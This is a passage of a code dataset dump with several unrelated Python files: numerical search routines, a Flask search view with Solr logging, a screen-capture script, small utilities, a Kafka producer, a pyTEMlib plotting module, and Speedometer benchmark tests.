initial = clock()\n    c = NelderMeadSearch()\n    minc = c.cost()\n    while(clock()-initial < MAX_RUN_TIME):\n        candidate = NelderMeadSearch()\n        cost = candidate.cost()\n        if cost < minc:\n            minc = cost\n            c = candidate  # keep the vector that produced the best cost\n    print('1. Nelder-Mead Search used', TRIANGLE_COUNT, 'random triangles.')\n    print('Vector = ', c, 'Cost = ', round(minc,5))\n    print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef runRandomSearch():\n    startTime = clock()\n    vector = Vector(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n    minc= vector.cost()\n    while(clock() - startTime < MAX_RUN_TIME):\n        global PROBE_COUNT1\n        PROBE_COUNT1+=1\n        candidate = Vector(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n        if(candidate.cost() < minc):\n            minc = candidate.cost()\n            vector = candidate  # report the best probe, not the last one drawn\n    print('2. Random Probing used', PROBE_COUNT1, 'probes.')\n    print('Vector =', vector, 'Cost =', round(minc,5))\n    print('---Search time =', round(clock() - startTime, 2), 'seconds\\n')\n    \ndef frange(start, stop, step):\n    i = start\n    while(i < stop):\n        yield i\n        i += step\n\n\ndef runHillClimbingRandomResetSearch():\n    initial = clock()\n    minc = runSteps(random()*DOMAIN_LIMIT,random()*DOMAIN_LIMIT)\n    while( clock()-initial < MAX_RUN_TIME):\n        cost = runSteps(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT)\n        if cost < minc:\n            minc = cost \n    print('3. Hill Climbing (Random Reset) used', PROBE_COUNT2, 'probes.')\n    print('Vector =', X, 'Cost =', round(minc,5))\n    print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef runSteps(p1,p2):\n    vector1 = (Vector(p1, p2))\n    cost1 = vector1.cost()\n    vector2 = (Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT))\n    cost2 = vector2.cost()\n    while cost1 < cost2:\n        global PROBE_COUNT2\n        PROBE_COUNT2+=1\n        cost2 = cost1\n        global X\n        X = step(p1,p2)\n        cost1 = X.cost()\n    return cost1\n    \ndef randomVector():\n    return Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT)\n    \ndef step(p1,p2):#radius=1\n    X1 = Vector(p1,p2)\n    for t in frange(0, pi*2, pi/4):\n        X = Vector(p1 + (cos(t)), p2 + (sin(t)))\n        if X.cost() < X1.cost():\n            X1.equals(X)\n    return X1\n\ndef runHillClimbingGridSearch():\n    initial = clock()\n    vector3 = (Vector(random()*DOMAIN_LIMIT, random()*DOMAIN_LIMIT))\n    minCost = vector3.cost()\n    while((clock()-initial < MAX_RUN_TIME)):\n        for x in range(1, DOMAIN_LIMIT):\n            for y in range(1, DOMAIN_LIMIT):\n                global PROBE_COUNT3\n                PROBE_COUNT3+=1\n                candidate = step(random()*x, random()*y)\n                cost = candidate.cost()\n                if cost < minCost:\n                    minCost = cost\n                    vector3 = candidate  # vector3 is reported with minCost below\n    print('4. 
Hill Climbing (Grid) used', PROBE_COUNT3, 'probes.')\n print('Vector =', vector3, 'Cost =', round(minCost,5))\n print('---Search time =', round(clock() - initial, 2), 'seconds\\n')\n\ndef main():\n print('SEARCH RESULTS:')\n runNelderMeadSearch()\n runRandomSearch()\n runHillClimbingRandomResetSearch()\n runHillClimbingGridSearch()\n\nif __name__ == '__main__': main()\n","sub_path":"NelderMead.py","file_name":"NelderMead.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162786185","text":"from flask import Blueprint, request, g, render_template, flash\nfrom flask.ext.solrquery import solr, signals as solr_signals #@UnresovledImport\n\n#from flask.ext.login import current_user #@UnresolvedImport\nfrom .forms import QueryForm\nfrom adsabs.core.solr import QueryBuilderSearch\nfrom adsabs.core.data_formatter import field_to_json\nfrom config import config\nfrom adsabs.core.logevent import LogEvent\nimport logging\n\n#Definition of the blueprint\nsearch_blueprint = Blueprint('search', __name__, template_folder=\"templates\", \n static_folder=\"static\", url_prefix='/search')\n\n__all__ = ['search_blueprint','search', 'search_advanced']\n\n@search_blueprint.after_request\ndef add_caching_header(response):\n \"\"\"\n Adds caching headers\n \"\"\"\n if not config.DEBUG:\n cache_header = 'max-age=3600, must-revalidate'\n else:\n cache_header = 'no-cache'\n response.headers.setdefault('Cache-Control', cache_header) \n return response\n\n@search_blueprint.before_request\ndef register_formatting_funcs():\n g.formatter_funcs = {'field_to_json': field_to_json}\n\n@search_blueprint.route('/', methods=('GET', 'POST'))\ndef search():\n \"\"\"\n returns the results of a search\n \"\"\"\n if not len(request.values):\n form = QueryForm(csrf_enabled=False)\n # prefill the database select menu option\n form.db_f.default = config.SEARCH_DEFAULT_DATABASE\n else:\n form = QueryForm.init_with_defaults(request.values)\n if form.validate():\n query_components = QueryBuilderSearch.build(form, request.values)\n resp = solr.query(**query_components)\n if resp.is_error():\n flash(resp.get_error_message(), 'error')\n return render_template('search_results.html', resp=resp, form=form)\n else:\n for field_name, errors_list in form.errors.iteritems():\n flash('errors in the form validation: %s.' 
% '; '.join(errors_list), 'error')\n return render_template('search.html', form=form)\n\n@search_blueprint.route('/facets', methods=('GET', 'POST'))\ndef facets():\n \"\"\"\n returns facet sets for a search query\n \"\"\"\n form = QueryForm.init_with_defaults(request.values)\n if form.validate():\n query_components = QueryBuilderSearch.build(form, request.values, facets_components=True)\n resp = solr.query(**query_components)\n return render_template('facets_sublevel.html', resp=resp, facet_field_interf_id=query_components['facet_field_interf_id'] )\n\n# if query_components.get('facet_fields') and query_components.get('facet_field_interf_id'):\n# resp = solr.facet_query(query_components['q'], \n# facet_fields=query_components['facet_fields'],\n# filters=query_components['filters'],\n# ui_filters=query_components['ui_filters'],\n# ui_q=query_components['ui_q'],\n# query_fields=query_components['query_fields']\n# )\n# return render_template('facets_sublevel.html', resp=resp, facet_field_interf_id=query_components['facet_field_interf_id'] )\n# else:\n# return 'facet query parameters error'\n \n \n@search_blueprint.route('/advanced/', methods=('GET', 'POST'))\ndef search_advanced():\n \"\"\"\n \"\"\"\n pass\n\n@solr_signals.error_signal.connect\ndef log_solr_error(sender, **kwargs):\n if hasattr(g, 'user_cookie_id'):\n kwargs['user_cookie_id'] = g.user_cookie_id\n event = LogEvent.new(request.url, **kwargs)\n logging.getLogger('search').info(event) \n \n@solr_signals.search_signal.connect\ndef log_solr_search(sender, **kwargs):\n \"\"\"\n extracts some data from the solr for log/analytics purposes\n \"\"\"\n if hasattr(g, 'user_cookie_id'):\n resp = kwargs.pop('response')\n log_data = {\n 'q': resp.get_query(),\n 'hits': resp.get_hits(),\n 'count': resp.get_count(),\n 'start': resp.get_start_count(),\n 'qtime': resp.get_qtime(),\n 'results': resp.get_doc_values('bibcode', 0, config.SEARCH_DEFAULT_ROWS),\n 'error_msg': resp.get_error_message(),\n 'http_status': resp.get_http_status(),\n 'solr_url': resp.request.url,\n 'user_cookie_id': g.user_cookie_id\n }\n log_data.update(kwargs)\n event = LogEvent.new(request.url, **log_data)\n logging.getLogger('search').info(event) \n","sub_path":"adsabs/modules/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"336080418","text":"import numpy as np\nfrom PIL import ImageGrab\nimport cv2\nimport time\nfrom conm import *\n\ndef process_img(image):\n original_image = image\n # convert to gray\n processed_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # edge detection\n processed_img = cv2.Canny(processed_img, threshold1 = 200, threshold2=300)\n return processed_img\n\n\n\ndef screen_record(a, b, c, d):\n last_time = time.time()\n while(True):\n printscreen = np.array(ImageGrab.grab(bbox=(a,b,c,d+50)))\n #print(printscreen.shape)\n print('loop took {} seconds'.format(time.time()-last_time))\n last_time = time.time()\n #ret = conm(printscreen, 1)\n ret = conm(printscreen, 1)\n shape = ret.shape\n inx = int(shape[0]/4)\n iny = int(shape[1]/4)\n ret = cv2.resize(ret, (iny, inx))\n cv2.imshow('window',ret)\n #cv2.imshow('window',cv2.cvtColor(printscreen, cv2.COLOR_BGR2RGB))\n if cv2.waitKey(25) & 0xFF == ord('q'):\n cv2.destroyAllWindows()\n break\n return ret\n\n#screen_record()\n","sub_path":"zhaoyi Li project/Zhaoyi Li 
project/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"100595273","text":"import re\ndef american_date_to_europian_date():\n month={\"January\":\"1\",\"February\":\"2\",\"March\":\"3\",\"April\":\"4\",\"May\":\"5\",\"June\":\"6\",\"July\":\"7\",\"August\":\"8\",\"September\":\"9\",\"October\":\"10\",\"November\":\"11\",\"December\":\"12\"}\n\n date = str(input())\n d = re.split(', | |/|,',date)\n #print(d)\n # print(date)\n\n #date= date.split('/')\n if d[0].isalpha():\n mm = month[d[0]]\n #print('{0}/{1}/{2}'.format(d[1], mm, d[2]))\n else:\n mm = d[0]\n eudate = '{0}/{1}/{2}'.format(d[1], mm, d[2]) \n print(eudate) \n\namerican_date_to_europian_date() ","sub_path":"python/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200675857","text":"from json import dumps\nfrom random import random, randint\n\nfrom kafka import KafkaProducer\n\nif __name__ == \"__main__\":\n # Create a producer connecting to a kafka broker\n producer = KafkaProducer(bootstrap_servers=['localhost:9092'],\n value_serializer=lambda x: dumps(x).encode('utf-8'))\n\n # Choose a random identity\n random_id = randint(0, 6)\n\n # Create some random data\n data = {\"sensorData1\": random(), \"sensorData2\": random(), \"id\": random_id}\n\n # Send the message\n message = producer.send('sensor-data-partitioned', value=data,\n key=str(random_id).encode())\n\n # Wait for it to be sent\n message.get()\n","sub_path":"02_consumer/python_producer.py","file_name":"python_producer.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"376705998","text":"# read txt in content\n# lowercase, ignore punctuation, split sentence in word and return list of words\nimport re\ndef read_data():\n fh = open(\"ScientificAmerican.txt\",\"r\",encoding=\"utf8\")\n content = fh.read()\n content = content.lower()\n content = re.sub(r'[^a-z\\']+',' ', content)\n return content.split()\n\n\n\n# us counter to count the frequency of lengths of words\n# order result by key and return it\nimport collections as cl\ndef process_data(list_of_words):\n result = cl.Counter(len(word.strip(' ')) for word in list_of_words)\n result = cl.OrderedDict(sorted(result.items()))\n result = dict(result)\n return result\n\n\n\n# print hist by dict\ndef print_count_histogram(data):\n str_hist =\"\"\n for item in data.items():\n str_hist = str_hist + str(item[0]) + \":\" + \"*\"*item[1] + \"\\n\"\n print(str_hist)\n\nprint_count_histogram(process_data(read_data()))","sub_path":"A10_25105515.py","file_name":"A10_25105515.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"450218377","text":"\"\"\"plotting of sidpy Datasets with bokeh for google colab\"\"\"\n\nimport numpy as np\nimport sidpy\nfrom sidpy.hdf.dtype_utils import is_complex_dtype\n\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom ipywidgets import widgets\n\n\nimport pyTEMlib.eels_tools as eels\nimport pyTEMlib.file_tools as ft\n\n\nfrom bokeh.layouts import column\nfrom bokeh.plotting import figure # , show, output_notebook\nfrom bokeh.models import CustomJS, Slider, Span\nfrom bokeh.models import LinearColorMapper, ColorBar, 
ColumnDataSource, BoxSelectTool\nfrom bokeh.palettes import Spectral11\n\nfrom pyTEMlib.sidpy_tools import *\nimport sys\nimport matplotlib.pyplot as plt\n# from matplotlib.widgets import Slider, Button\nimport matplotlib.patches as patches\n# import matplotlib.animation as animation\n\nif sys.version_info.major == 3:\n unicode = str\n\ndefault_cmap = plt.cm.viridis\n\n\ndef plot(dataset, palette='Viridis256'):\n \"\"\"plot according to data_type\"\"\"\n if dataset.data_type.name == 'IMAGE_STACK':\n p = plot_stack(dataset, palette=palette)\n elif dataset.data_type.name == 'IMAGE':\n p = plot_image(dataset, palette=palette)\n elif dataset.data_type.name == 'SPECTRUM':\n p = plot_spectrum(dataset, palette=palette)\n else:\n p = None\n return p\n\n\ndef plot_stack(dataset, palette=\"Viridis256\"):\n \"\"\"Plotting a stack of images\n\n Plotting a stack of images contained in a sidpy.Dataset.\n The images can be scrolled through with a slider widget.\n\n Parameters\n ----------\n dataset: sidpy.Dataset\n sidpy dataset with data_type 'IMAGE_STACK'\n palette: bokeh palette\n palette is optional\n\n Returns\n -------\n p: bokeh plot\n\n Example\n -------\n >> import pyTEMlib\n >> from bokeh.plotting import figure, show, output_notebook\n >> output_notebook()\n >> p = pyTEMlib.viz(dataset)\n >> p.show(p)\n \"\"\"\n\n if not isinstance(dataset, sidpy.Dataset):\n raise TypeError('Need a sidpy dataset for plotting')\n if dataset.data_type.name != 'IMAGE_STACK':\n raise TypeError('Need an IMAGE_STACK for plotting a stack')\n\n stack = np.array(dataset-dataset.min())\n stack = stack/stack.max()*256\n stack = np.array(stack, dtype=int)\n\n color_mapper = LinearColorMapper(palette=palette, low=0, high=256)\n\n p = figure(match_aspect=True, plot_width=600, plot_height=600)\n im_plot = p.image(image=[stack[0]], x=[0], y=[0], dw=[dataset.x[-1]], dh=[dataset.y[-1]], color_mapper=color_mapper)\n p.x_range.range_padding = 0\n p.y_range.range_padding = 0\n p.xaxis.axis_label = 'distance (nm)'\n p.yaxis.axis_label = 'distance (nm)'\n\n slider = Slider(start=0, end=stack.shape[0]-1, value=0, step=1, title=\"frame\")\n\n update_curve = CustomJS(args=dict(source=im_plot, slider=slider, stack=stack),\n code=\"\"\"var f = slider.value;\n source.data_source.data['image'] = [stack[f]];\n // necessary because we mutated source.data in-place\n source.data_source.change.emit(); \"\"\")\n slider.js_on_change('value', update_curve)\n\n return column(slider, p)\n\n\ndef plot_image(dataset, palette=\"Viridis256\"):\n \"\"\"Plotting an image\n\n Plotting an image contained in a sidpy.Dataset.\n\n Parameters\n ----------\n dataset: sidpy.Dataset\n sidpy dataset with data_type 'IMAGE_STACK'\n palette: bokeh palette\n palette is optional\n\n Returns\n -------\n p: bokeh plot\n\n Example\n -------\n >> import pyTEMlib\n >> from bokeh.plotting import figure, show, output_notebook\n >> output_notebook()\n >> p = pyTEMlib.viz(dataset)\n >> p.show(p)\n\n\n \"\"\"\n if not isinstance(dataset, sidpy.Dataset):\n raise TypeError('Need a sidpy dataset for plotting')\n\n if dataset.data_type.name not in ['IMAGE', 'IMAGE_STACK']:\n raise TypeError('Need an IMAGE or IMAGE_STACK for plotting an image')\n\n if dataset.data_type.name == 'IMAGE_STACK':\n image = dataset.sum(axis=0)\n image = sidpy.Dataset.from_array(image)\n image.data_type = 'image'\n image.title = dataset.title\n image.set_dimension(0, dataset.dim_1)\n image.set_dimension(1, dataset.dim_2)\n else:\n image = dataset\n\n p = figure(tooltips=[(\"x\", \"$x\"), (\"y\", \"$y\"), 
(\"value\", \"@image\")], match_aspect=True,\n               plot_width=675, plot_height=600, )\n    color_mapper = LinearColorMapper(palette=palette, low=float(image.min()), high=float(image.max()))\n\n    # must give a vector of image data for image parameter\n    p.image(image=[np.array(image)], x=0, y=0, dw=image.x[-1], dh=image.y[-1], color_mapper=color_mapper,\n            level=\"image\")\n    p.x_range.range_padding = 0\n    p.y_range.range_padding = 0\n\n    p.grid.grid_line_width = 0.\n    p.xaxis.axis_label = 'distance (nm)'\n    p.yaxis.axis_label = 'distance (nm)'\n\n    color_bar = ColorBar(color_mapper=color_mapper, major_label_text_font_size=\"7pt\",\n                         label_standoff=6, border_line_color=None, location=(0, 0))\n    p.add_layout(color_bar, 'right')\n    return p\n\n\ndef plot_spectrum(dataset, selected_range=None, palette=Spectral11):\n    \"\"\"Plot spectrum.\n\n    selected_range defaults to None so that plot() can dispatch here; the\n    CustomJS callback below writes the user's box selection to a\n    notebook-global 'selected_range' variable.\n    \"\"\"\n    if not isinstance(dataset, sidpy.Dataset):\n        raise TypeError('Need a sidpy dataset for plotting')\n\n    if dataset.data_type.name not in ['SPECTRUM']:\n        raise TypeError('Need an sidpy.Dataset of data_type SPECTRUM for plotting a spectrum ')\n\n    p = figure(x_axis_type=\"linear\", plot_width=800, plot_height=400,\n               tooltips=[(\"index\", \"$index\"), (\"(x,y)\", \"($x, $y)\")],\n               tools=\"pan,wheel_zoom,box_zoom,reset, hover, lasso_select\")\n    p.add_tools(BoxSelectTool(dimensions=\"width\"))\n\n    # first line is dataset\n    spectrum = ColumnDataSource(data=dict(x=dataset.dim_0, y=np.array(dataset)))\n    p.scatter('x', 'y', color='blue', size=1, alpha=0., source=spectrum,\n              selection_color=\"firebrick\", selection_alpha=0.)\n    p.line(x='x', y='y', source=spectrum, legend_label=dataset.title, color=palette[0], line_width=2)\n    # add other lines if available\n    if 'add2plot' in dataset.metadata:\n        data = dataset.metadata['add2plot']\n        for key, line in data.items():\n            p.line(dataset.dim_0.values, line['data'], legend_label=line['legend'], color=palette[key], line_width=2)\n    p.legend.click_policy = \"hide\"\n    p.xaxis.axis_label = dataset.labels[0]\n    p.yaxis.axis_label = dataset.data_descriptor\n    p.title.text = dataset.title\n\n    my_span = Span(location=0, dimension='width', line_color='gray', line_width=1)\n    p.add_layout(my_span)\n\n    callback = CustomJS(args=dict(s1=spectrum), code=\"\"\"\n        var inds = s1.selected.indices;\n        if (inds.length == 0)\n            return;\n        var kernel = IPython.notebook.kernel;\n        kernel.execute(\"selected_range = \" + [inds[0], inds[inds.length-1]]);\"\"\")\n\n    spectrum.selected.js_on_change('indices', callback)\n    return p\n\n\nclass CurveVisualizer(object):\n    \"\"\"Plots a sidpy.Dataset with spectral dimension\n\n    \"\"\"\n    def __init__(self, dset, spectrum_number=None, axis=None, leg=None, **kwargs):\n        if not isinstance(dset, sidpy.Dataset):\n            raise TypeError('dset should be a sidpy.Dataset object')\n        if axis is None:\n            self.fig = plt.figure()\n            self.axis = self.fig.add_subplot(1, 1, 1)\n        else:\n            self.axis = axis\n            self.fig = axis.figure\n\n        self.dset = dset\n        self.selection = []\n        [self.spec_dim, self.energy_scale] = get_dimensions_by_type('spectral', self.dset)[0]\n\n        self.lined = dict()\n        self.plot(**kwargs)\n\n    def plot(self, **kwargs):\n        line1, = self.axis.plot(self.energy_scale.values, self.dset, label='spectrum', **kwargs)\n        lines = [line1]\n        if 'add2plot' in self.dset.metadata:\n            data = self.dset.metadata['add2plot']\n            for key, line in data.items():\n                line_add, = self.axis.plot(self.energy_scale.values, line['data'], label=line['legend'])\n                lines.append(line_add)\n\n        legend = self.axis.legend(loc='upper right', fancybox=True, shadow=True)\n        
legend.get_frame().set_alpha(0.4)\n\n for legline, origline in zip(legend.get_lines(), lines):\n legline.set_picker(True)\n legline.set_pickradius(5) # 5 pts tolerance\n self.lined[legline] = origline\n self.fig.canvas.mpl_connect('pick_event', self.onpick)\n\n self.axis.axhline(0, color='gray', alpha=0.6)\n self.axis.set_xlabel(self.dset.labels[0])\n self.axis.set_ylabel(self.dset.data_descriptor)\n self.axis.ticklabel_format(style='sci', scilimits=(-2, 3))\n self.fig.canvas.draw_idle()\n\n def update(self, **kwargs):\n x_limit = self.axis.get_xlim()\n y_limit = self.axis.get_ylim()\n self.axis.clear()\n self.plot(**kwargs)\n self.axis.set_xlim(x_limit)\n self.axis.set_ylim(y_limit)\n\n def onpick(self, event):\n # on the pick event, find the orig line corresponding to the\n # legend proxy line, and toggle the visibility\n legline = event.artist\n origline = self.lined[legline]\n vis = not origline.get_visible()\n origline.set_visible(vis)\n # Change the alpha on the line in the legend so we can see what lines\n # have been toggled\n if vis:\n legline.set_alpha(1.0)\n else:\n legline.set_alpha(0.2)\n self.fig.canvas.draw()\n\n \ndef verify_spectrum_dataset(datasets):\n if isinstance(datasets, sidpy.Dataset):\n datasets = {'Channel_000': datasets}\n \n first_dataset = datasets[list(datasets)[0]]\n has_complex_dataset = False\n for dat in datasets.values():\n if is_complex_dtype(dat.dtype):\n has_complex_dataset = True\n \n \n if first_dataset.data_type.name != 'SPECTRUM':\n raise TypeError('We need a spectrum dataset here')\n if first_dataset.ndim >1:\n if first_dataset.shape[1] >1:\n raise TypeError('Wrong dimensions for spectrum datasset')\n \n energy_dim = first_dataset.get_spectrum_dims()\n energy_dim = first_dataset.get_dimension_by_number(energy_dim[0])[0]\n energy_dim.label = f'{energy_dim.quantity} ({energy_dim.units})'\n \n default_plot_dictionary = {'title': '',\n 'theme': \"plotly_white\",\n 'y_scale': 1.0,\n 'y_axis_label': first_dataset.data_descriptor,\n 'x_axis_label': energy_dim.label,\n 'show_legend': True,\n 'height': 500,\n 'figure_size': None,\n 'scale_bar': False,\n 'colorbar': True,\n 'set_title': True,\n 'has_complex_dataset': has_complex_dataset}\n \n \n default_plot_dictionary.update(first_dataset.metadata['plot_parameter'])\n first_dataset.metadata['plot_parameter'] = default_plot_dictionary\n \n return datasets\n\ndef spectrum_view_plotly(datasets, figure=None, show=False):\n \n datasets = verify_spectrum_dataset(datasets)\n first_dataset = datasets[list(datasets)[0]]\n plot_dic = first_dataset.metadata['plot_parameter']\n \n if figure is None:\n if plot_dic['has_complex_dataset']:\n fig = make_subplots(rows=1, cols=2, subplot_titles=(\"Magnitude\", \"Phase\"))\n else:\n fig = go.Figure()\n\n else:\n fig = figure\n\n for key, dat in datasets.items():\n if dat.data_type == first_dataset.data_type:\n energy_dim = dat.get_spectrum_dims()\n energy_dim = dat.get_dimension_by_number(energy_dim[0])[0]\n if is_complex_dtype(dat.dtype):\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.abs(dat).squeeze()*plot_dic['y_scale'], name=f'{dat.title}-Magnitude', mode=\"lines+markers\", marker=dict(size=2)), row=1, col=1)\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.angle(dat).squeeze()*plot_dic['y_scale'], name=f'{dat.title}-Phase', mode=\"lines+markers\", marker=dict(size=2)), row=1, col=2)\n else:\n fig.add_trace(go.Scatter(x=energy_dim.values, y=np.array(dat).squeeze()*plot_dic['y_scale'], name=dat.title, mode=\"lines+markers\", marker=dict(size=2)))\n \n\n 
fig.update_layout(\n selectdirection='h',\n showlegend = plot_dic['show_legend'],\n dragmode='select',\n title_text=plot_dic['title'],\n yaxis_title_text=plot_dic['y_axis_label'],\n xaxis_title_text=plot_dic['x_axis_label'],\n height=plot_dic['height'],\n template=plot_dic['theme']\n )\n fig.update_layout(hovermode='x unified')\n \n if plot_dic['has_complex_dataset']:\n fig.update_yaxes(title_text='angle (rad)', row = 1, col = 2)\n fig.update_xaxes(title_text=plot_dic['x_axis_label'], row = 1, col = 2)\n\n config = {'displayModeBar': True}\n if show:\n fig.show(config=config)\n return fig\n\n\nclass SpectrumView(object):\n def __init__(self, datasets, figure=None, **kwargs):\n first_dataset = datasets[list(datasets)[0]]\n if first_dataset.data_type.name != 'SPECTRUM':\n raise TypeError('We need a spectrum dataset here')\n if first_dataset.ndim >1:\n if first_dataset.shape[1] >1:\n raise TypeError('Wrong dimensions for spectrum datasset')\n \n energy_dim = first_dataset.get_spectrum_dims()\n energy_dim = first_dataset.get_dimension_by_number(energy_dim[0])[0]\n\n if 'plot_parameter' not in first_dataset.metadata:\n first_dataset.metadata['plot_parameter'] = {}\n plot_dic = first_dataset.metadata['plot_parameter']\n energy_dim.label = f'{energy_dim.quantity} ({energy_dim.units})'\n\n plot_dic['title'] = kwargs.pop('title', '')\n plot_dic['theme'] = kwargs.pop('theme', \"plotly_white\")\n plot_dic['y_scale'] = kwargs.pop('y_scale', 1.0)\n plot_dic['y_axis_label'] = kwargs.pop('y_axis_label', first_dataset.data_descriptor)\n plot_dic['x_axis_label'] = kwargs.pop('x_axis_label', energy_dim.label)\n plot_dic['height'] = kwargs.pop('height', 500)\n \n\n if 'incident_beam_current_counts' in first_dataset.metadata['experiment']:\n plot_dic['y_scale'] = 1e6/first_dataset.metadata['experiment']['incident_beam_current_counts']\n plot_dic['y_axis_label'] = ' probability (ppm)'\n # plot_dic['y_scale'] = 1e6/first_dataset.sum()\n\n def selection_fn(trace,points,selector):\n self.energy_selection = [points.point_inds[0], points.point_inds[-1]]\n\n self.fig = spectrum_view_plotly(datasets)\n\n self.spectrum_widget = go.FigureWidget(self.fig)\n\n self.spectrum_widget.data[0].on_selection(selection_fn)\n self.spectrum_widget.data[0].on_click(self.identify_edges)\n\n self.edge_annotation = 0\n self.edge_line = 0\n self.regions = {}\n self.initialize_edge()\n\n self.plot = display(self.spectrum_widget)\n\n def initialize_edge(self):\n \"\"\" Intitalizes edge cursor\n Should be run first so that edge cursor is first\n \"\"\"\n self.edge_annotation = len(self.spectrum_widget.layout.annotations)\n self.edge_line = len(self.spectrum_widget.layout.shapes)\n self.spectrum_widget.add_vline(x=200, line_dash=\"dot\", line_color='blue',\n annotation_text= \" \", \n annotation_position=\"top right\",\n visible = False)\n\n def identify_edges(self, trace, points, selector):\n energy = points.xs[0]\n edge_names = find_edge_names(points.xs[0])\n self.spectrum_widget.layout['annotations'][self.edge_annotation].x=energy\n \n self.spectrum_widget.layout['annotations'][self.edge_annotation].text = f\"{edge_names}\"\n self.spectrum_widget.layout['annotations'][self.edge_annotation].visible = True\n self.spectrum_widget.layout['shapes'][self.edge_line].x0 = energy\n self.spectrum_widget.layout['shapes'][self.edge_line].x1 = energy\n self.spectrum_widget.layout['shapes'][self.edge_line].visible = True\n self.spectrum_widget.layout.update()\n\n def add_region(self, text, start, end, color='blue'): \n if text not in self.regions:\n 
self.regions[text] = {'annotation': len(self.spectrum_widget.layout.annotations),\n 'shape': len(self.spectrum_widget.layout.shapes),\n 'start': start,\n 'end': end,\n 'color': color}\n self.spectrum_widget.add_vrect(x0=start, x1=end, \n annotation_text=text, annotation_position=\"top left\",\n fillcolor=color, opacity=0.15, line_width=0)\n self.spectrum_widget.layout.update()\n else:\n self.update_region(text, start, end)\n\n\n def update_region(self, text, start, end): \n if text in self.regions:\n region = self.regions[text]\n self.spectrum_widget.layout.annotations[region['annotation']].x =start\n self.spectrum_widget.layout['shapes'][region['shape']].x0 = start\n self.spectrum_widget.layout['shapes'][region['shape']].x1 = end\n self.spectrum_widget.layout.update()\n\n def regions_visibility(self, visibility=True):\n\n for region in self.regions.values():\n self.spectrum_widget.layout.annotations[region['annotation']].visible = visibility\n self.spectrum_widget.layout.shapes[region['shape']].visible = visibility\n\n\ndef find_edge_names(energy_value):\n\n selected_edges = []\n for shift in [1,2,5,10,20]:\n selected_edge = ''\n edges = eels.find_major_edges(energy_value, shift)\n edges = edges.split('\\n')\n for edge in edges[1:]:\n edge = edge[:-3].split(':')\n name = edge[0].strip()\n energy = float(edge[1].strip())\n selected_edge = name\n\n if selected_edge != '':\n selected_edges.append(selected_edge)\n if len(selected_edges)>0:\n return selected_edges\n","sub_path":"pyTEMlib/viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":18439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222821974","text":"# Copyright 2022 The Chromium Authors\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport abc\nimport argparse\nimport csv\nfrom dataclasses import dataclass\nfrom typing import Optional, Sequence, Type\nfrom unittest import mock\n\nfrom crossbench.benchmarks.speedometer.speedometer import (SpeedometerBenchmark,\n SpeedometerProbe,\n SpeedometerStory)\nfrom crossbench.env import (HostEnvironment, HostEnvironmentConfig,\n ValidationMode)\nfrom crossbench.runner import Runner\nfrom tests.crossbench.benchmarks import helper\n\n\nclass SpeedometerBaseTestCase(\n helper.PressBaseBenchmarkTestCase, metaclass=abc.ABCMeta):\n\n @property\n @abc.abstractmethod\n def benchmark_cls(self) -> Type[SpeedometerBenchmark]:\n pass\n\n @property\n @abc.abstractmethod\n def story_cls(self) -> Type[SpeedometerStory]:\n pass\n\n @property\n @abc.abstractmethod\n def probe_cls(self) -> Type[SpeedometerProbe]:\n pass\n\n @property\n @abc.abstractmethod\n def name(self) -> str:\n pass\n\n def test_iterations(self):\n with self.assertRaises(AssertionError):\n self.benchmark_cls(iterations=-1)\n benchmark = self.benchmark_cls(iterations=123)\n for story in benchmark.stories:\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.iterations, 123)\n\n @dataclass\n class Namespace(argparse.Namespace):\n stories = \"all\"\n iterations = 10\n separate: bool = False\n custom_benchmark_url: Optional[str] = None\n\n def test_default_all(self):\n default_story_names = [\n story.name for story in self.story_cls.default(separate=True)\n ]\n all_story_names = [\n story.name for story in self.story_cls.all(separate=True)\n ]\n self.assertListEqual(default_story_names, all_story_names)\n\n def test_iterations_kwargs(self):\n args = self.Namespace()\n 
self.benchmark_cls.from_cli_args(args)\n with self.assertRaises(AssertionError):\n args.iterations = \"-10\"\n self.benchmark_cls.from_cli_args(args)\n args.iterations = \"1234\"\n benchmark = self.benchmark_cls.from_cli_args(args)\n for story in benchmark.stories:\n assert isinstance(story, self.story_cls)\n self.assertEqual(story.iterations, 1234)\n\n def test_story_filtering_cli_args_all_separate(self):\n stories = self.story_cls.default(separate=True)\n args = mock.Mock()\n args.stories = \"all\"\n args.separate = True\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertListEqual(\n [story.name for story in stories],\n [story.name for story in stories_all],\n )\n\n def test_story_filtering_cli_args_all(self):\n stories = self.story_cls.default(separate=False)\n args = mock.Mock()\n args.stories = \"all\"\n args.custom_benchmark_url = self.story_cls.URL_LOCAL\n args.separate = False\n stories_all = self.benchmark_cls.stories_from_cli_args(args)\n self.assertEqual(len(stories), 1)\n 